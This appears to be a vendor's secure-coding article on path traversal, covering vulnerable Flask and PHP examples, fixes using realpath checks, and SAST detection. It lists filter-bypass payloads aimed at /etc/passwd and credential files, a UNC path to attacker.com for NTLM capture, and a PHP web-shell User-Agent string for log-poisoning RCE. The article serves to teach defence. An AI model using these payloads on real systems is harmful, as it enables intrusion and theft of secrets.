What Path Traversal Is

Path traversal (also called directory traversal) occurs when user-supplied input is used to construct a file path without proper validation or canonicalisation, allowing an attacker to navigate outside the intended directory. The attack uses sequences like ../ (or their encoded equivalents) to traverse up the directory tree and access arbitrary files on the server.

It affects any feature that reads, downloads, or includes files based on user input: document download APIs, image serving endpoints, template loaders, log file viewers, file managers, report generators. It's a common finding even in modern codebases because developers often add file-serving functionality quickly and validation gets overlooked.

The Classic ../../../etc/passwd Attack

file_server.py (vulnerable) Python
from flask import Flask, request, send_file
import os

app = Flask(__name__)
BASE_DIR = "/var/app/uploads"

# Vulnerable: the user-supplied filename goes straight into the path join
@app.get("/download")
def download():
    filename = request.args.get("file")
    filepath = os.path.join(BASE_DIR, filename)
    return send_file(filepath)

The attacker requests: /download?file=../../../../etc/passwd

os.path.join produces /var/app/uploads/../../../../etc/passwd, which the operating system resolves to /etc/passwd regardless of BASE_DIR. The server happily returns the file.
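The resolution can be reproduced without touching the file system. The sketch below is illustrative only: it uses posixpath (the POSIX flavour of os.path) so that it behaves the same on any platform, and naive_join is a made-up helper name that mimics the vulnerable handler.

```python
import posixpath

BASE_DIR = "/var/app/uploads"

def naive_join(filename):
    """Mimic the vulnerable handler: join, then collapse ../ segments lexically."""
    return posixpath.normpath(posixpath.join(BASE_DIR, filename))

print(naive_join("report.pdf"))               # stays under BASE_DIR
print(naive_join("../../../../etc/passwd"))   # climbs out of BASE_DIR
print(naive_join("/etc/passwd"))              # absolute input discards BASE_DIR
```

The last call shows a second problem with the join: when the user-supplied component is an absolute path, os.path.join drops everything before it, so no ../ sequence is needed at all.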

Common targets beyond /etc/passwd: /etc/shadow (password hashes, normally readable only by root), /proc/self/environ (environment variables including secrets), ~/.ssh/id_rsa (private keys), application config files with database passwords, /var/log/apache2/access.log (useful for log poisoning).

URL Encoding and Filter Bypass Tricks

Many applications try to filter ../, but naive string replacement is easy to bypass:

bypass_payloads.txt Text
# Standard
../../../../etc/passwd

# URL encoded
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

# Double URL encoded
%252e%252e%252f%252e%252e%252fetc%252fpasswd

# If filter strips ../ once:
....//....//....//etc/passwd

# Mix of encodings
..%2f..%2f..%2fetc/passwd

# Null byte (older apps, PHP)
../../etc/passwd%00.jpg

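The lesson: don't rely on filtering traversal sequences. Canonicalise the path and verify that it starts with the expected base directory. A filter has to anticipate every encoding and parser quirk; a check on the canonical path does not, because it inspects the path after decoding and resolution.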
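A short sketch of why the payloads above get through. The naive_filter function is a deliberately weak, hypothetical filter (a single-pass string replace), and urllib.parse.unquote stands in for whatever decoding layers sit between the request and the file system call.

```python
from urllib.parse import unquote

def naive_filter(value):
    """A deliberately weak filter: remove every literal '../' in a single pass."""
    return value.replace("../", "")

# The nested payload reassembles into a working traversal after the pass.
print(naive_filter("....//....//....//etc/passwd"))

# Encoded payloads contain no literal '../', so the filter leaves them alone;
# each decoding layer applied afterwards peels off one level of encoding.
double_encoded = "%252e%252e%252f%252e%252e%252fetc%252fpasswd"
once = unquote(naive_filter(double_encoded))
twice = unquote(once)
print(once)
print(twice)
```

Running the filter in a loop until the string stops changing closes the first hole but not the second, which is why the check belongs on the resolved path rather than on the raw input.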

Windows vs Linux Path Differences

Windows path traversal uses backslashes and has additional quirks:

  • Windows supports both \ and / as path separators
  • Drive letter traversal: C:\Windows\System32\drivers\etc\hosts
  • UNC paths: \\attacker.com\share\file (can be used for NTLM credential capture)
  • Windows path canonicalisation: ...\ and ..../ can work in some parsers

Cross-platform applications that run on both Linux and Windows need to validate paths against the OS-specific rules of the production environment.
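Some of these behaviours can be observed from any platform with Python's ntpath module, which implements the Windows path rules. This is a sketch under assumptions: the C:\app\uploads base directory and the windows_join helper are hypothetical, and only lexical joining is shown, not what a particular web framework does.

```python
import ntpath

BASE_DIR = r"C:\app\uploads"  # hypothetical base directory

def windows_join(filename):
    """Join and normalise using Windows rules, regardless of the host OS."""
    return ntpath.normpath(ntpath.join(BASE_DIR, filename))

print(windows_join("report.pdf"))                              # stays under BASE_DIR
print(windows_join("../../Windows/win.ini"))                   # forward slashes work
print(windows_join(r"..\..\Windows\win.ini"))                  # so do backslashes
print(windows_join(r"C:\Windows\System32\drivers\etc\hosts"))  # drive letter replaces the base
print(windows_join(r"\\attacker.com\share\file"))              # UNC path replaces the base
```

A filter that only looks for ../ misses the backslash form, and a check that only looks for traversal sequences misses the drive-letter and UNC forms entirely.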

Local File Inclusion (LFI) and How It Escalates

In PHP and some older templating systems, path traversal escalates to Local File Inclusion: the included file is executed rather than just read. This changes the impact from information disclosure to code execution.

page_loader.php (vulnerable) PHP
// Vulnerable: includes a user-controlled file path
$page = $_GET['page'];
include("pages/" . $page);

// Attacker sends: ?page=../../../../var/log/apache2/access.log
// If they've previously injected PHP code into the log, it executes

Combining with Log Poisoning for RCE

LFI + log poisoning is a classic RCE chain. The attacker writes PHP code into a log file via a crafted request, then includes that log file via LFI to trigger execution:

  1. Send a request with PHP code in the User-Agent: User-Agent: <?php system($_GET['cmd']); ?>
  2. Web server logs this to /var/log/apache2/access.log
  3. Exploit LFI: ?page=../../../../var/log/apache2/access.log
  4. Append command: &cmd=id
  5. Command executes on the server

Session file inclusion is another vector: with file-based sessions, PHP stores each session as sess_[sessionid] under session.save_path (often /tmp or /var/lib/php/sessions). If you can control part of the session data content, you can plant code in the session file and include it via LFI.
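Both chains depend on the attacker choosing which file gets included. One way to take that choice away, sketched here in Python for consistency with the other examples, is to map a small set of known page names to fixed paths instead of building the path from input. The page names and paths are hypothetical, and this is an illustration of the idea rather than a drop-in replacement for the PHP loader.

```python
# Hypothetical page names and template paths, used only for illustration.
ALLOWED_PAGES = {
    "home": "pages/home.php",
    "about": "pages/about.php",
    "contact": "pages/contact.php",
}

def resolve_page(requested):
    """Return the template path for a known page name, or None if it is not allowlisted."""
    return ALLOWED_PAGES.get(requested)

print(resolve_page("about"))
print(resolve_page("../../../../var/log/apache2/access.log"))
```

Because the user input is only ever used as a dictionary key, no traversal sequence or encoding trick can reach the file system.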

How to Fix It Properly

The correct fix is to canonicalise the path and verify it starts with the intended base directory:

file_server_fixed.py Python
import os
from flask import Flask, request, send_file, abort

app = Flask(__name__)
BASE_DIR = os.path.realpath("/var/app/uploads")

@app.get("/download")
def download():
    filename = request.args.get("file", "")
    # Canonicalise: resolve all ../ and symlinks
    filepath = os.path.realpath(os.path.join(BASE_DIR, filename))
    # Verify the resolved path is within the intended directory
    if not filepath.startswith(BASE_DIR + os.sep):
        abort(403)
    if not os.path.isfile(filepath):
        abort(404)
    return send_file(filepath)

file_server.js (Node.js fixed) JavaScript
const express = require('express');
const fs = require('fs');
const path = require('path');
const app = express();
const BASE_DIR = fs.realpathSync('/var/app/uploads');
const isInside = (p) => p.startsWith(BASE_DIR + path.sep);

app.get('/download', (req, res) => {
    // Lexical check: collapse ../ segments without touching the disk
    const requested = path.resolve(BASE_DIR, String(req.query.file || ''));
    if (!isInside(requested)) {
        return res.status(403).send('Forbidden');
    }
    let filepath;
    try {
        // Follow symlinks (throws if the path does not exist), then re-check
        filepath = fs.realpathSync(requested);
    } catch (err) {
        return res.status(404).send('Not found');
    }
    if (!isInside(filepath)) {
        return res.status(403).send('Forbidden');
    }
    res.sendFile(filepath);
});
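The trailing separator in the prefix check matters. Without it, a sibling directory whose name merely starts with the base name passes the test. The sketch below shows the pitfall and one possible alternative based on os.path.commonpath, which compares whole path components; is_within is a hypothetical helper name and the paths are examples only.

```python
import os

# Pitfall: a bare prefix test accepts a sibling directory.
print("/var/app/uploads_backup/a.txt".startswith("/var/app/uploads"))  # True

def is_within(base_dir, user_path):
    """Return True if user_path, joined to base_dir and resolved, stays inside base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    try:
        # commonpath works on whole components, so uploads_backup is not
        # mistaken for a child of uploads.
        return target != base and os.path.commonpath([base, target]) == base
    except ValueError:
        # Raised on Windows when the two paths are on different drives.
        return False
```

Keeping the check in a small function like this also makes it easy to unit-test against the bypass payloads listed earlier.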

Use os.path.realpath, not os.path.normpath: normpath resolves the path lexically but doesn't follow symlinks. realpath resolves symlinks too, which is important because a symlink inside your upload directory could otherwise point outside it.
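The difference is easy to demonstrate in a throwaway directory. This sketch assumes a platform where os.symlink is permitted (on Windows it may need extra privileges); the directory and file names are invented for the demonstration.

```python
import os
import tempfile

def compare_checks(root):
    """Create uploads/ containing a symlink that points outside it, then run both checks."""
    root = os.path.realpath(root)
    base = os.path.join(root, "uploads")
    outside = os.path.join(root, "outside")
    os.makedirs(base)
    os.makedirs(outside)
    # uploads/link points at the sibling directory outside/
    os.symlink(outside, os.path.join(base, "link"))

    requested = os.path.join(base, "link", "secret.txt")
    lexical = os.path.normpath(requested)    # symlink left unresolved
    resolved = os.path.realpath(requested)   # symlink followed
    prefix = base + os.sep
    return lexical.startswith(prefix), resolved.startswith(prefix)

with tempfile.TemporaryDirectory() as tmp:
    normpath_ok, realpath_ok = compare_checks(tmp)
    print("normpath check passes:", normpath_ok)
    print("realpath check passes:", realpath_ok)
```

The normpath-based check accepts the request because the path still looks like it sits under uploads/, while the realpath-based check rejects it because the resolved location is outside.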

SAST Detection

Path traversal is well-suited to SAST because the vulnerable pattern is consistent: user-controlled input reaching a file system operation (open(), send_file(), include(), readFile()) without proper path canonicalisation and boundary checking. SAST tools trace the taint flow from HTTP request parameters to file system sinks and flag cases where no canonicalisation occurs.

  • Look for os.path.join with user input that is not followed by a realpath + startswith check
  • PHP include, require, file_get_contents with unsanitised variables
  • Node.js fs.readFile, res.sendFile, path.join without a path.resolve (or fs.realpath) guard and prefix check
  • Java new File(basePath, userInput) without canonical path verification
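To make the first pattern concrete, here is a toy check built on Python's ast module. It is a rough heuristic written for illustration, not how any particular SAST product works: it performs no taint tracking and simply flags functions that call a file sink without calling realpath anywhere in the same function. The SINKS and GUARDS sets and the function names are assumptions.

```python
import ast

SINKS = {"open", "send_file"}   # file system sinks to look for (illustrative)
GUARDS = {"realpath"}           # calls treated as evidence of canonicalisation

def call_name(node):
    """Return the called function's short name, e.g. 'realpath' for os.path.realpath(...)."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return None

def flag_unguarded_sinks(source):
    """Return (function, sink, line) for each sink call in a function with no guard call."""
    findings = []
    for fn in ast.walk(ast.parse(source)):
        if not isinstance(fn, ast.FunctionDef):
            continue
        calls = [n for n in ast.walk(fn) if isinstance(n, ast.Call)]
        if {call_name(c) for c in calls} & GUARDS:
            continue
        for c in calls:
            if call_name(c) in SINKS:
                findings.append((fn.name, call_name(c), c.lineno))
    return findings

VULNERABLE = '''
def download():
    filename = request.args.get("file")
    filepath = os.path.join(BASE_DIR, filename)
    return send_file(filepath)
'''

FIXED = '''
def download():
    filename = request.args.get("file", "")
    filepath = os.path.realpath(os.path.join(BASE_DIR, filename))
    if not filepath.startswith(BASE_DIR + os.sep):
        abort(403)
    return send_file(filepath)
'''

print(flag_unguarded_sinks(VULNERABLE))
print(flag_unguarded_sinks(FIXED))
```

A real analyser would also confirm that the sink argument is derived from request data and that the realpath result is the value actually checked and used, which is what taint tracking adds over a syntactic match like this.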

Find Path Traversal Vulnerabilities Automatically

AquilaX SAST traces tainted paths from HTTP input to filesystem operations, catching directory traversal before it reaches your production servers.
